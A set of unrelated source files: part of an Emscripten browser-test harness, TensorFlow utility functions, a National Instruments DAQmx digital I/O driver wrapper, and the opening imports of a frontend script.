// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
/** @suppress {uselessCode} */
function setupRefTest() {
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
/** @suppress{checkTypes} */
window.requestAnimationFrame = function(func) {
return realRAF(function() {
func();
realRAF(doReftest);
});
};
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
}
setupRefTest();
''' % (reporting, basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
# Inject support code for reporting results. This adds an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-sIN_TEST_HARNESS']
if reporting != Reporting.NONE:
# For basic reporting we inject JS helper functions to report the result back to the server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
# If C reporting (i.e. REPORT_RESULT macro) is required
# also compile in report_result.c and force-include report_result.h
args += ['-I' + TEST_ROOT,
'-include', test_file('report_result.h'),
test_file('report_result.c')]
if EMTEST_BROWSER == 'node':
args.append('-DEMTEST_NODE')
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
with a given result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
assert('reporting' not in kwargs)
assert('expected' not in kwargs)
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_wasm2js=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args
args = args.copy()
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-sGL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
if EMTEST_BROWSER == 'node':
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
output = self.run_js('test.js')
self.assertContained('RESULT: ' + expected[0], output)
else:
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in original_args and (also_wasm2js or self.also_wasm2js):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-sWASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-sGL_TESTING'], message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure,
make,
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = Path(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
# Useful in debugging sometimes to comment this out, and two lines above
shutil.copytree(source_dir, project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = os.environ.copy()
env.update(env_init)
if not native:
# Inject emcmake, emconfigure or emmake accordingly, but only if we are
# cross compiling.
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
else:
make = [EMMAKE] + make
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EMTEST_BUILD_VERBOSE < 2 else None
stderr = err if EMTEST_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
print('-- configure stdout --')
print(read_file(Path(project_dir, 'configure_out')))
print('-- end configure stdout --')
print('-- configure stderr --')
print(read_file(Path(project_dir, 'configure_err')))
print('-- end configure stderr --')
raise
# if we run configure or cmake we don't then need any kind
# of special env when we run make below
env = None
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EMTEST_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EMTEST_BUILD_VERBOSE < 2 else None
stderr = make_err if EMTEST_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, read_binary(f)))
return generated_libs
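# A minimal usage sketch, not part of the original harness: tests normally reach
# build_library through RunnerCore.get_library (see get_zlib_library above), which
# supplies build_dir, output_dir and the in-memory cache. The configure/make commands
# and the wrapper name below are assumptions for illustration only.
def _example_build_zlib(build_dir, output_dir):
    # Build third_party/zlib once and return the list of generated archives.
    return build_library(os.path.join('third_party', 'zlib'), build_dir, output_dir,
                         generated_libs=['libz.a'],
                         configure=['sh', './configure'],  # assumed configure invocation
                         make=['make'],
                         make_args=['libz.a'])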
|
tf_util.py
|
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
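# A brief usage sketch (assumption: this behaves the same in graph and eager mode, since
# it only relies on tf.cond). With a truthy condition the first branch is returned.
def _switch_example():
    cond = tf.constant(1)
    a = tf.constant([1.0, 2.0])
    b = tf.constant([3.0, 4.0])
    return switch(cond, a, b)  # evaluates to [1.0, 2.0]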
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
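# A small worked example: with the default delta of 1.0 the loss is quadratic for |x| < 1
# and linear beyond, so 0.5 -> 0.5 * 0.5**2 = 0.125 and 2.0 -> 1.0 * (2.0 - 0.5) = 1.5.
def _huber_loss_example():
    x = tf.constant([0.5, 2.0])
    return huber_loss(x)  # evaluates to approximately [0.125, 1.5]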
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
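# A usage sketch (the shape is hypothetical): the initializer draws Gaussian weights and
# rescales them so every slice along `axis` has L2 norm equal to `std`.
def _normc_initializer_example():
    init = normc_initializer(std=1.0, axis=0)
    w = init((64, 32), dtype=tf.float32)  # each of the 32 columns has unit L2 norm
    return w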
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(grads, var_list, clip_norm=None):
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
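# A minimal sketch of flatgrad's None handling (variables are hypothetical): gradients
# that are None are replaced with zeros of the matching variable shape before concatenation.
def _flatgrad_example():
    v1 = tf.Variable(tf.zeros([2, 3]))
    v2 = tf.Variable(tf.zeros([4]))
    grads = [tf.ones([2, 3]), None]  # pretend v2 received no gradient
    return flatgrad(grads, [v1, v2])  # shape [10]: six ones followed by four zeros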
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
self.shapes = list(map(var_shape, var_list))
self.total_size = np.sum([intprod(shape) for shape in self.shapes])
self.var_list = var_list
def __call__(self, theta):
start = 0
for (shape, v) in zip(self.shapes, self.var_list):
size = intprod(shape)
v.assign(tf.reshape(theta[start:start + size], shape))
start += size
class GetFlat(object):
def __init__(self, var_list):
self.var_list = var_list
def __call__(self):
return tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in self.var_list]).numpy()
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# ================================================================
# Shape adjustment for feeding into tf tensors
# ================================================================
def adjust_shape(input_tensor, data):
'''
adjust shape of the data to the shape of the tensor if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
input_tensor tensorflow input tensor
data input data to be (potentially) reshaped to be fed into input
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
input_shape = [x or -1 for x in input_tensor.shape.as_list()]
assert _check_shape(input_shape, data.shape), \
'Shape of data {} is not compatible with shape of the input {}'.format(data.shape, input_shape)
return np.reshape(data, input_shape)
def _check_shape(input_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
squeezed_input_shape = _squeeze_shape(input_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_input = squeezed_input_shape[i]
if s_input != -1 and s_data != s_input:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
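# An illustrative sketch, assuming the TF1-style tf.placeholder API (consistent with the
# tf.get_variable / tf.variable_scope usage above): a flat list of 4 values is reshaped
# to match a (None, 4) input tensor.
def _adjust_shape_example():
    input_ph = tf.placeholder(tf.float32, [None, 4])
    data = [1.0, 2.0, 3.0, 4.0]
    return adjust_shape(input_ph, data)  # numpy array of shape (1, 4)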
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
daqmx.py
|
from collections import namedtuple
from fixate.core.common import ExcThread
# Basic Functions
from PyDAQmx import byref, DAQmxResetDevice, TaskHandle, numpy, int32, uInt8, float64, uInt64, c_char_p, uInt32
# Tasks
from PyDAQmx import DAQmxCreateTask, DAQmxStartTask, DAQmxWaitUntilTaskDone, DAQmxStopTask, DAQmxClearTask
# Channels
from PyDAQmx import DAQmxCreateDOChan, DAQmxCreateDIChan, DAQmxReadDigitalLines, DAQmxWriteDigitalLines, \
DAQmx_Val_GroupByScanNumber, DAQmx_Val_ChanPerLine, DAQmxReadCounterScalarF64, DAQmx_Val_Rising, DAQmx_Val_Seconds, \
DAQmxCfgSampClkTiming, DAQmx_Val_FiniteSamps
# Two Edge Separation
from PyDAQmx import DAQmxCreateCITwoEdgeSepChan, DAQmxSetCITwoEdgeSepFirstTerm, DAQmxGetCITwoEdgeSepFirstTerm, \
DAQmxSetCITwoEdgeSepSecondTerm, DAQmxGetCITwoEdgeSepSecondTerm, DAQmx_Val_Falling
# Signal Routing
from PyDAQmx import DAQmxConnectTerms, DAQmxDisconnectTerms, DAQmxTristateOutputTerm, DAQmx_Val_InvertPolarity, \
DAQmx_Val_DoNotInvertPolarity
from fixate.core.exceptions import InstrumentError, ParameterError
from fixate.drivers.daq.helper import DAQ
IORange = namedtuple('IORange', ['port', 'range_start', 'range_end'])
IORange.__new__.__defaults__ = (0, None, None)
IOLine = namedtuple('IOLine', ['port', 'line'])
IOLine.__new__.__defaults__ = (0, None)
class DaqTask:
"""
"""
task_state = ""
task = None
def read(self):
raise NotImplemented("Read not available for this Task")
def write(self, data):
raise NotImplemented("Write not available for this Task")
def trigger(self):
raise NotImplemented("Trigger not available for this Task")
def init(self):
"""
This method should be overridden to create the task
:return:
"""
def stop(self):
if self.task_state == "running":
DAQmxStopTask(self.task)
self.task_state = "stopped"
def clear(self):
self.stop()
if self.task_state != "":
DAQmxClearTask(self.task)
self.task = None
self.task_state = ""
def start(self):
if self.task_state == "running":
return
if self.task_state == "":
self.init()
DAQmxStartTask(self.task)
self.task_state = "running"
class DigitalOut(DaqTask):
"""
"""
def __init__(self, task_string, io_length):
self.io_length = io_length
self.task_string = task_string
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
if self.task_state in ["init", "stopped"]:
self.start()
def read(self):
self.init()
data_arr = numpy.zeros(self.io_length, uInt8)
samples_per_chan = int32()
num_bytes_per_sample = int32()
DAQmxReadDigitalLines(self.task,
1, # Samples per channel
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr,
len(data_arr),
byref(samples_per_chan),
byref(num_bytes_per_sample),
None)
return data_arr
def write(self, data):
"""
Data must be an iterable like a list of 1s and 0s
Data is grouped by scan number. Each element in the array will write to each line in the digital output until
exhausted and then will start from the beginning for the next sample. Sample rate is as set in creating the IO
task.
"""
self.init()
try:
if len(data) % self.io_length:
raise ValueError("data must be a length divisible by {}".format(self.io_length))
data_arr = numpy.zeros(len(data), uInt8)
data_arr[:] = data
except TypeError:
if self.io_length != 1:
raise ValueError("data must be a list of length divisible by {}".format(self.io_length))
data_arr = numpy.zeros(1, uInt8)
data_arr[:] = [data]
written = int32()
DAQmxWriteDigitalLines(self.task,
len(data_arr) // self.io_length, # Samples per channel
1, # Autostart task
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr, written, None)
class DigitalIn(DaqTask):
"""
"""
def __init__(self, task_string, io_length):
self.io_length = io_length
self.task_string = task_string
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDIChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
if self.task_state in ["init", "stopped"]:
self.start()
def read(self):
self.init()
data_arr = numpy.zeros(self.io_length, uInt8)
samples_per_chan = int32()
num_bytes_per_sample = int32()
DAQmxReadDigitalLines(self.task,
1, # Samples per channel
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr,
len(data_arr),
byref(samples_per_chan),
byref(num_bytes_per_sample),
None)
return data_arr
class BufferedWrite(DaqTask):
"""
"""
def __init__(self, task_string, io_length, frequency):
self.task_string = task_string
self.io_length = io_length
self.frequency = frequency
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
def write(self, data):
"""
The task should be in stopped state when calling write, it automatically starts the task through the
DAQmxWriteDigitalLines call. When write is finished it is back in a stopped state
:param data:
:return:
"""
self.init()
try:
if len(data) % self.io_length:
raise ValueError("data must be a length divisible by {}".format(self.io_length))
except TypeError as e:
raise ValueError("data must be in an list divisible by {}".format(self.io_length)) from e
if len(data) == self.io_length:
# Sample clock only works for more than one sample so duplicate the sample
data = list(data)
data.extend(data)
DAQmxCfgSampClkTiming(self.task, None, float64(self.frequency), DAQmx_Val_Rising, DAQmx_Val_FiniteSamps,
uInt64(int(len(data) // self.io_length)))
try:
data_arr = numpy.zeros((len(data)), uInt8)
data_arr[:] = data
written = int32()
DAQmxWriteDigitalLines(self.task, int(len(data) // self.io_length), 1, -1,
DAQmx_Val_GroupByScanNumber, data_arr, written, None)
self.task_state = "running"
DAQmxWaitUntilTaskDone(self.task, -1)
if written.value != len(data) // self.io_length:
raise InstrumentError("Values not written correctly")
finally:
self.stop()
class TwoEdgeSeparation(DaqTask):
"""
DAQmxGetCITwoEdgeSepFirstTerm and DAQmxGetCITwoEdgeSepSecondTerm currently have a bug where if they are called
there is no way to create a new task unless the process is destroyed. Therefore there is no error checking on the
encoding of the terminal for the source and destination terminal. A validate terminals parameter has been added
but it should only be used once and as a debugging tool as it will prevent any future tasks being created
"""
_data = float64()
_trigger_thread = None
def __init__(self, device_name, counter_chan, min_val, max_val, first_edge_type, second_edge_type,
source_terminal, destination_terminal, validate_terminals=False):
self.device_name = device_name
self.counter_chan = counter_chan
self.min_val = min_val
self.max_val = max_val
self.first_edge_type = first_edge_type
self.second_edge_type = second_edge_type
self.source_terminal = source_terminal
self.destination_terminal = destination_terminal
self.validate_terminals = validate_terminals
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateCITwoEdgeSepChan(self.task, "{}/{}".format(self.device_name, self.counter_chan).encode(), b"",
float64(self.min_val), float64(self.max_val), DAQmx_Val_Seconds,
self.first_edge_type,
self.second_edge_type, b"")
if self.source_terminal:
tmp_data = c_char_p(self.source_terminal.encode())
DAQmxSetCITwoEdgeSepFirstTerm(self.task, "{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data)
if self.validate_terminals:
tmp_data = c_char_p("".encode())
DAQmxGetCITwoEdgeSepFirstTerm(self.task,
"{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data,
uInt32(16))
if self.source_terminal not in tmp_data.value.decode('utf-8'):
raise InstrumentError(
"Source terminal is set to {}, should be /{}/{}".format(tmp_data.value.decode('utf-8'),
self.device_name,
self.source_terminal))
if self.destination_terminal:
tmp_data = c_char_p(self.destination_terminal.encode())
DAQmxSetCITwoEdgeSepSecondTerm(self.task, "{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data)
if self.validate_terminals:
tmp_data = c_char_p("".encode())
DAQmxGetCITwoEdgeSepSecondTerm(self.task,
"{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data,
uInt32(16))
if self.destination_terminal not in tmp_data.value.decode('utf-8'):
raise InstrumentError(
"Destination terminal is set to {}, should be /{}/{}".format(tmp_data.value.decode('utf-8'),
self.device_name,
self.destination_terminal))
self.task_state = "init"
def read(self):
self._trigger_thread.join(10)
if self._trigger_thread.exec_info:
try:
raise self._trigger_thread.exec_info
finally:
self._trigger_thread = None
self._trigger_thread = None
return self._data
def _read(self):
self.init()
return DAQmxReadCounterScalarF64(self.task, float64(10), byref(self._data), None)
def trigger(self):
if self._trigger_thread:
self.clear()
self._trigger_thread.stop()
self._trigger_thread.join(10)
if self._trigger_thread.is_alive():
raise InstrumentError("Existing Trigger Event in Progress")
self._trigger_thread = ExcThread(target=self._read)
self._trigger_thread.start()
class DaqMx(DAQ):
"""
Implements the digital input and output functions of the National Instruments DAQ
usage:
daq = DaqMx()
# Create a digital output from port 0 line 2 to line 4 named 'P0.2:4'
daq.create_digital_output('P0.2:4', port=0, range_start=2, length=3)
# Create a digital output with default port 0, at line 7 named 'reset'
daq.create_digital_output('reset', 7)
# Create a digital input at port 0 line 1
daq.create_digital_input('P0.1', range_start=1)
# This example assumes that port 0 line 1 is shorted to port 0 line 7 named reset
daq.start()
print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
>>>'Port 7: [0] Echo Port: [0]'
daq["P0.7"] = 1 # or True or '1' or [1]
print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
>>>'Port 7: [1] Echo Port: [1]'
print(daq["P0.2:4"])
>>>'[0 0 0]'
daq["P0.2:4"] = [0, 1, 0] # Need to assign all values if initialised as multiple
print(daq["P0.2:4"])
>>>'[0 1 0]'
daq.stop()
"""
def __init__(self):
self.device_name = "Dev1"
self.tasks = {}
self.reset()
self.triggers = {}
def reset(self):
DAQmxResetDevice(self.device_name.encode())
for _, task in self.tasks.items():
task.task_state = ""
def signal_route(self, source_terminal, destination_terminal, disconnect=False, tri_state=False, invert=False):
"""
Immediately routes a signal between two terminals
Set destination_terminal to '' if tri_state output is required on the source_terminal
terminals are PFI X as they are the programmable terminals.
See NI-MAX Device Routes for available terminal names.
Leave out the device name
eg. /Dev 1/PFI0 would be PFI0
"""
source_terminal = '/{}/{}'.format(self.device_name, source_terminal).encode()
destination_terminal = '/{}/{}'.format(self.device_name, destination_terminal).encode()
if disconnect:
DAQmxDisconnectTerms(source_terminal, destination_terminal)
elif tri_state:
DAQmxTristateOutputTerm(source_terminal)
else:
if invert:
invert = DAQmx_Val_InvertPolarity
else:
invert = DAQmx_Val_DoNotInvertPolarity
DAQmxConnectTerms(source_terminal, destination_terminal, invert)
def create_two_edge_separation(self, ident, counter_chan, min_val, max_val, first_edge_type, second_edge_type,
source_terminal=None, destination_terminal=None):
"""
Returns the two edge separation of two signals
:param ident:
Identification string used for reading the data via
daq = DaqMx()
daq.create_two_edge_separation(ident, **params)
daq.trigger_measurement(ident)
# Do stuff
# Read the edge separation after causing the event
edge_sep = daq[ident]
:param counter_chan:
For X-Series DAQs PCI
'ctr0', 'ctr1', 'ctr2', 'ctr3' where the connected terminals are:
Start = "AUX", Stop = "GATE"
ctr0 ctr1 ctr2 ctr3
Start: PFI 10 Pin45 Start: PFI 11 Pin46 Start: PFI 2 Pin43 Start: PFI 7 Pin38
Stop: PFI 9 Pin3 Stop: PFI 4 Pin41 Stop: PFI 1 Pin10 Stop: PFI 6 Pin5
:param min_val:
The minimum value, in units, that you expect to measure.
eg. 0.0001
:param max_val:
The maximum value, in units, that you expect to measure.
eg. 0.83
:param first_edge_type:
The start trigger on the first edge
"rising" or "falling"
:param second_edge_type:
The stop trigger on the second edge
"rising" or "falling"
:param source_terminal:
:param destination_terminal:
Override the default counter terminals.
eg. for ctr0, source_terminal = "PFI14" will make the Start pin PFI 14 instead of PFI 10
"""
if counter_chan not in ['ctr0', 'ctr1', 'ctr2', 'ctr3']:
raise ValueError("Invalid counter channel selected")
if first_edge_type.lower() == 'falling':
first_edge_type = DAQmx_Val_Falling
else:
first_edge_type = DAQmx_Val_Rising
if second_edge_type.lower() == 'falling':
second_edge_type = DAQmx_Val_Falling
else:
second_edge_type = DAQmx_Val_Rising
self.tasks[ident] = TwoEdgeSeparation(self.device_name, counter_chan, min_val, max_val, first_edge_type,
second_edge_type, source_terminal, destination_terminal)
def trigger_measurement(self, ident):
try:
self.tasks[ident].trigger()
except KeyError as e:
raise ValueError("{} is not a valid task".format(ident)) from e
def create_buffered_write(self, ident, frequency, *dio_ranges):
"""
Sets up the ranges to synchronize when writing to output at a specified frequency.
This will force each write to the output for this ident to contain the amount of samples specified.
eg.
>>>daq = DaqMx()
# Setup output @ 100Hz, 3 samples on port0 line 7 and 9
>>>daq.create_buffered_write("MyOutput", 100, (0, 7, 7), (0, 9, 9))
3 samples over 2 lines is 6 data values.
>>>daq["MyOutput"] = [0 ,0, 1, 1, 0, 1]
it is interleaved so it is written [line7, line9, line7, line9, line7, line9]
Requires ports that enable buffered writes.
In the X-Series daq this is port 0
This disables reading from the output port for these pins.
:param ident
The identification used to access this task
:param frequency
The sample frequency for writing
:type frequency integer or float
:param dio_ranges
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
The number of samples in each digital output write is determined by the length of the
data divided by the total number of lines.
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
do_channel, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = BufferedWrite(task_string=do_channel, io_length=data_length, frequency=frequency)
def _build_digital_task_string(self, *dio_ranges):
"""
:param dio_ranges:
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
:return:
The string used to create the task by connecting each of the ports together
"""
data_length = 0
task_arr = []
for rng in dio_ranges:
task_arr.append(self.device_name + '/port{}/line{}:{}'.format(*rng))
data_length += rng[2] - rng[1] + 1 # range end - range start + 1
return ', '.join(task_arr).encode(), data_length
def create_digital_output(self, ident, *dio_ranges):
"""
:param dio_ranges
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
A digital output is created in the order of the dio_ranges and can be accessed by the ident key.
>>>daq = DaqMx()
>>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
>>>rng_2 = IORange(0, 11,11) # Port 0 line 11
>>>daq.create_digital_output("MyOut", rng_1, rng_2)
>>>daq["MyOut"] = [0, 1, 0, 1] # Port 0 Line 8 and 11 high
>>>print(daq["MyOut"]) # Read back the value
>>>[0, 1, 0, 1]
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
task_string, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = DigitalOut(task_string, io_length=data_length)
def create_digital_input(self, ident, *dio_ranges):
"""
:param dio_ranges
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
A digital output is created in the order of the dio_ranges and can be accessed by the ident key.
>>>daq = DaqMx()
>>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
>>>rng_2 = IORange(0, 11,11) # Port 0 line 11
>>>daq.create_digital_input("MyOut", rng_1, rng_2)
>>>print(daq["MyOut"]) # Tie Port 0 line 8 and line 11 high
>>>[0, 1, 0, 1]
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
task_string, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = DigitalIn(task_string, io_length=data_length)
def __getitem__(self, ident):
return self.read(ident)
def __setitem__(self, ident, data):
self.write(ident, data)
def write(self, ident, value):
try:
return self.tasks[ident].write(value)
except KeyError:
raise KeyError("{} is not a valid identifier".format(ident))
def read(self, ident):
try:
return self.tasks[ident].read()
except KeyError:
raise KeyError("{} is not a valid identifier\nAvailable tasks: {}".format(ident, sorted(self.tasks)))
def start_task(self, ident):
"""
:param ident:
:return:
"""
self.tasks[ident].start()
def stop_task(self, ident):
"""
Stops the task registered under ident so that it can be started again later.
:param ident:
:return:
"""
self.tasks[ident].stop()
def clear_task(self, ident):
"""
Stops the task registered under ident and clears up the resources allocated to it.
:param ident:
:return:
"""
self.tasks[ident].clear()
|
frontend.py
|
#!/usr/bin/env python3
# *************************************************************************
#
# Copyright (c) 2021 Andrei Gramakov. All rights reserved.
#
# This file is licensed under the terms of the MIT license.
# For a copy, see: https://opensource.org/licenses/MIT
#
# site: https://agramakov.me
# e-mail: mail@agramakov.me
#
# *************************************************************************
from logging import INFO
from psutil import WINDOWS as IS_WINDOWS
from typing import Union
import ast
import socket
import time
